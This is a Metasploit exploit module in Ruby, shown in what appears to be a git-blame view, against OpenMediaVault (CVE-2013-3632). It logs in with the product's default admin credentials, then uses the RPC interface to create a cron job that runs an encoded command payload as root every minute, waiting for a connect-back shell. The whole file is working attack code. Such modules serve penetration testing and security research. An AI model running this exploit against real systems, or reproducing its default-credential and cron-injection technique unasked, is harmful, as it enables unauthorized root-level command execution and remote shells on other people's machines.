2013-10-30 15:25:48 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-30 15:25:48 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'OpenMediaVault Cron Remote Command Execution',
|
|
|
|
'Description' => %q{
|
|
|
|
OpenMediaVault allows an authenticated user to create cron jobs as aribtrary users on the system.
|
|
|
|
An attacker can abuse this to run arbitrary commands as any user available on the system (including root).
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
2013-10-30 17:25:55 +00:00
|
|
|
['CVE', '2013-3632'],
|
|
|
|
['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
|
2013-10-30 15:25:48 +00:00
|
|
|
],
|
|
|
|
'Privileged' => true,
|
|
|
|
'DefaultOptions' => { 'WfsDelay' => 60 },
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Compat' =>
|
|
|
|
{
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
'RequiredCmd' => 'generic perl ruby bash telnet python',
|
|
|
|
}
|
|
|
|
},
|
|
|
|
'Platform' => ['unix', 'linux'],
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
'Targets' => [['Automatic',{}]],
|
|
|
|
'DisclosureDate' => 'Oct 30 2013',
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
|
|
|
|
OptString.new('PASSWORD', [ false, "Password to authenticate with", 'openmediavault'])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
init = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => normalize_uri(target_uri.path, '/index.php')
|
|
|
|
})
|
|
|
|
|
|
|
|
sess = init.get_cookies
|
|
|
|
post = "{\"service\":\"Authentication\",\"method\":\"login\",\"params\":{\"username\":\"#{datastore["USERNAME"]}\",\"password\":\"#{datastore["PASSWORD"]}\"}}"
|
|
|
|
|
|
|
|
login = send_request_cgi({
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => normalize_uri(target_uri.path, '/rpc.php'),
|
|
|
|
'data' => post,
|
|
|
|
'ctype' => 'application/json',
|
|
|
|
'cookie' => sess
|
|
|
|
})
|
|
|
|
|
|
|
|
if !login or login.code != 200
|
|
|
|
fail_with("Login failed")
|
|
|
|
end
|
|
|
|
|
|
|
|
sess = login.get_cookies
|
|
|
|
post = '{"service":"Cron","method":"set","params":{"enable":true,"minute":"*","hour":"*","dayofmonth":"*","month":"*","dayofweek":"*","username":"root","command":"'
|
|
|
|
post << payload.encoded.gsub('"', '\"')
|
|
|
|
post << '","comment":"","type":"userdefined","everynminute":false,"everynhour":false,"everyndayofmonth":false,"sendemail":false,"uuid":"undefined"}}'
|
|
|
|
|
|
|
|
resp = send_request_cgi({
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => normalize_uri(target_uri.path, '/rpc.php'),
|
|
|
|
'data' => post,
|
|
|
|
'ctype' => 'application/json',
|
|
|
|
'cookie' => sess
|
|
|
|
})
|
|
|
|
|
|
|
|
if !resp or resp.code != 200
|
|
|
|
fail_with("Posting cron failed.")
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Waiting for connect-back, this will take up to a minute")
|
|
|
|
end
|
|
|
|
end
|